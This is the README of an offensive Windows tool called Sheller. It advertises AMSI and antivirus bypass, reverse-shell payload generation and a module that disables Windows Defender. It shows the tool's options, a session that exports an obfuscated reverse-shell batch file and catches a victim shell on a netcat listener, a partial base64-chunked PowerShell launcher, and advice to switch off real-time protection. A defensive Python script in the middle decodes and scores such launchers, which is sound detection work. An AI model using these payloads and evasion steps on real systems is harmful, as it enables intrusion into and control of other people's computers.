Sheller is a Windows post-exploitation tool built to bypass all known Antimalware Scan Interface (AMSI) scanners, including Defender, Bitdefender, Kaspersky, McAfee, NANO-Antivirus, Kingsoft, Avast, Avira and many more.
To use it, python3 and powershell (Windows) or pwsh (Linux) are required; the script runs on Windows and on Linux distributions. The sheller module obtains a reverse shell on the victim's device and provides several AMSI bypass modules, such as base64 encoding, chunking and variable-name randomization. There is also a module that disables every Windows Defender antivirus feature when it is executed with admin privileges.
root@lukeproducts:~/Sheller# python3 sheller.py
Copyright LukeProducts 2022, all rights reserved
┌──────────────────────────────────────┐
│ ▼ ## │
│ ┌─────────────────┘ ┌────##───┐ │
│ │AMSI Bypass Tool │ ## │ │
│ └──────────────────────┘ ## └─► │
│ ## │
│ © Copyright by LukeProducts ## │
└──────────────────────────────────────┘
usage: a.py [-h] [-s SHELLOUTNAME] [-avkill ANTIVIRUSKILL] [-lh LOCALHOST] [-ph PAYLOADHOST] [-pp PAYLOADPORT]
[-lstp LISTENPORT] [-lp LOCALPORT] [-b64] [-ch] [-v]
optional arguments:
-h, --help show this help message and exit
-s SHELLOUTNAME, --shelloutname SHELLOUTNAME
Reverse Shell. Value: fileoutputname. Requires: [-lh] [-lp], optional: [-b64] [-ch] [-v]
-avkill ANTIVIRUSKILL, --antiviruskill ANTIVIRUSKILL
script to deactivate AV of victim if executed with admin privileges. Optional flag: [-b64]
[-ch]
-lh LOCALHOST, --localhost LOCALHOST
host for payload ("lh" for automatically assign host to this systems address)
-ph PAYLOADHOST, --payloadhost PAYLOADHOST
host to connect to
-pp PAYLOADPORT, --payloadport PAYLOADPORT
port to to connect to
-lstp LISTENPORT, --listenport LISTENPORT
port to listen on with netcat
-lp LOCALPORT, --localport LOCALPORT
port for payload (4 digit number recommended)
-b64 encodes payload to base64
-ch chunks up base64 encoded string (chunking probability in CHUNK_PROBABILITY)
-v, --varencode changes all variables names to an random 10 hex digit encoded into VAR_ENCODING encoding
type (default is md5)
root@lukeproducts:~/Sheller# python3 sheller.py -s xy.bat -lh lh -lp 4444 -b64 -ch -v
Host set to "LukeProductsKali" (192.168.0.129)
[*] Successfully exported payload to "xy.bat" with encoding base64 and chunked up 87 times!
listening on [any] 4444 ...
connect to [192.168.0.129] from (UNKNOWN) [192.168.0.129] 1716
Microsoft Windows [Version 10.0.19042.1415]
(c) Microsoft Corporation. All rights reserved.
D:\Victim>
powershell /w 1 /C "$a=[scriptblock]::create([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAAYwBsAGUAYQBuAHUAcAAgAHsAaQBm'+'ACAAKAAkADMAYwBhADQAYgBhADUANgA2AGMAZgBlAGQANQBjADEAYwA1ADMAMQBmAGQAMgA1ADkAYgBjAGYAMAA5ADcAOAAuAEMAbwBuAG4AZQBjAHQAZQBkACAALQBlAHEAIAAkAHQAcgB1AGUAKQAgAHsAJAAzAGMAYQA0AGIAYQA1ADYANgBjAGYAZQBk'+'ADUAYwAx'+'...')));Invoke-Command -ScriptBlock $a"
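A defender reading the transcript above will want to know what the encoding (-b64), chunking (-ch) and variable-randomization (-v) modules described earlier leave behind in process-creation telemetry. The following Python is an added example and is not part of Sheller: it reassembles the 'chunk'+'chunk' literal that the launcher passes to FromBase64String, decodes it the same way the launcher does ([Text.Encoding]::Unicode, i.e. UTF-16LE), counts md5-style variable names in the decoded script and scores the result. The sample command line, chunk length, scoring weights and threshold are constructed assumptions; the harmless sample script only reuses the 32-hex variable name visible in the launcher above.

```python
"""Triage helper for the chunked, base64-encoded PowerShell launcher shown
in the transcript. Added example, not part of Sheller; the sample command
line is constructed here from a harmless script."""
import base64
import binascii
import re

# Indicators visible in the launcher transcript: hidden window, scriptblock
# execution, and a FromBase64String call fed with concatenated string literals.
HIDDEN_WINDOW = re.compile(r"[/-]w(?:indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)
FROM_B64 = re.compile(
    r"FromBase64String\s*\(\s*((?:'[A-Za-z0-9+/=]*'\s*(?:\+\s*)?)+)\)", re.IGNORECASE)
CHUNK = re.compile(r"'([A-Za-z0-9+/=]*)'")
SCRIPTBLOCK = re.compile(r"\[scriptblock\]::create|Invoke-Command\s+-ScriptBlock", re.IGNORECASE)
# Variables renamed to an md5 hex digest (the -v module's default) look like $<32 hex chars>.
HEX_VAR = re.compile(r"\$[0-9a-f]{32}\b")


def reassemble_base64(cmdline):
    """Return (joined base64 string, chunk count), or (None, 0) if no literal chunks are passed."""
    m = FROM_B64.search(cmdline)
    if not m:
        return None, 0
    chunks = CHUNK.findall(m.group(1))
    return "".join(chunks), len(chunks)


def decode_payload(b64):
    """Decode as the launcher does: base64 -> UTF-16LE text. Returns None on malformed input."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze(cmdline):
    """Score one process command line (e.g. from Sysmon event 1 or Security 4688)."""
    b64, chunks = reassemble_base64(cmdline)
    decoded = decode_payload(b64) if b64 else None
    hex_vars = len(HEX_VAR.findall(decoded)) if decoded else 0
    score = 0
    score += 1 if HIDDEN_WINDOW.search(cmdline) else 0
    score += 1 if SCRIPTBLOCK.search(cmdline) else 0
    score += 1 if b64 is not None else 0          # base64 launcher at all
    score += 2 if chunks > 1 else 0                # concatenated chunks (the -ch module)
    score += 2 if hex_vars else 0                  # md5-style identifiers (the -v module)
    # Threshold is an assumption; tune it against your own baseline of PowerShell usage.
    return {"chunks": chunks, "decoded": decoded, "hex_vars": hex_vars,
            "score": score, "flagged": score >= 4}


def build_sample_cmdline(script, chunk_len=12):
    """Constructed test fixture: wrap a harmless script in the launcher shape from the transcript."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    parts = [b64[i:i + chunk_len] for i in range(0, len(b64), chunk_len)]
    joined = "+".join("'%s'" % p for p in parts)
    return ('powershell /w 1 /C "$a=[scriptblock]::create([Text.Encoding]::Unicode.GetString('
            '[Convert]::FromBase64String(%s)));Invoke-Command -ScriptBlock $a"' % joined)


# Harmless script that reuses the md5-style variable name visible in the transcript above.
SAMPLE_SCRIPT = ("$3ca4ba566cfed5c1c531fd259bcf0978 = 'benign sample'; "
                 "Write-Host $3ca4ba566cfed5c1c531fd259bcf0978")
SAMPLE_CMDLINE = build_sample_cmdline(SAMPLE_SCRIPT)
BENIGN_CMDLINE = 'powershell -Command "Get-Date"'

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        result = analyze(line)
        print(result["flagged"], result["score"], result["chunks"], (result["decoded"] or "")[:60])
```

Because the decoded text is recovered, a detection pipeline can hand it to a second stage (for example a rule matching the `.Connected -eq $true` reconnect loop visible in the decoded prefix above) instead of matching only on the outer launcher, which the chunking and variable renaming are designed to vary.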
If you run this script on Windows, turn off Defender's Real-time Protection for it first, because otherwise the script gets cut off at runtime several times. The reason is that AMSI flags sheller while it is running.
DISCLAIMER: THIS IS FOR EDUCATIONAL PURPOSES ONLY! NO LIABILITY FOR ILLEGAL USE IS ASSUMED!
© Copyright by LukeProducts